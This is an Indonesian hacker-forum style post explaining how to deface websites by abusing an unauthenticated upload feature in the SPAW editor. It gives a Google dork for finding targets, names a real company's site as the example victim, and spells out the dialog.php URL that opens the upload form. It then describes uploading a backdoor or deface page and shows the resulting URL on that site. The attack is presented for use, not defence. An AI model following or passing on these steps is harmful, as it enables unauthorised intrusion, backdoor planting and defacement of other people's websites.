Ane lagi jalan2 malem,eh nemu cara deface web dengan menggunakan kelemahan Spaw uploader..
sebelumnya maap ya omz om kalau repost n maap kalo tricknya udah jadul,maklum masih nubie 
langsung aja ,pertama kita cari dulu di paman ane dengan dork :
Code:
inurl:spaw2/uploads/files/contoh ane pake target yang udah di dapet
Code:
http://punjlloyd.com/admin/spaw2/uploads/files/Corporate%20Identity/Stacked%20Punj%20Lloyd%20Logo/Logos/AI_Files/kode yang
Code:
spaw2/uploads/files/Corporate%20Identity/Stacked%20Punj%20Lloyd%20Logo/Logos/AI_Filesganti menjadi seperti di bawah ini
Code:
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=filesjadinya kaya gini nih omz
Code:
http://punjlloyd.com/admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=filesnanti bakalan keluar tuh tempat buat upload filenya..
tinggal di upload aja file/backdoor yang mau kita upload,nanti bakal keluar kaya gini
terakhir tinggal di panggil deh kaya gini
Code:
http://punjlloyd.com/admin/spaw2/uploads/files/ADa.htmlsekali lagi maap ya kalo trik nya ketinggalan jaman..

kalau boleh ane minta yang ijo2 nya ya omz om sekalian..
0 comments:
Post a Comment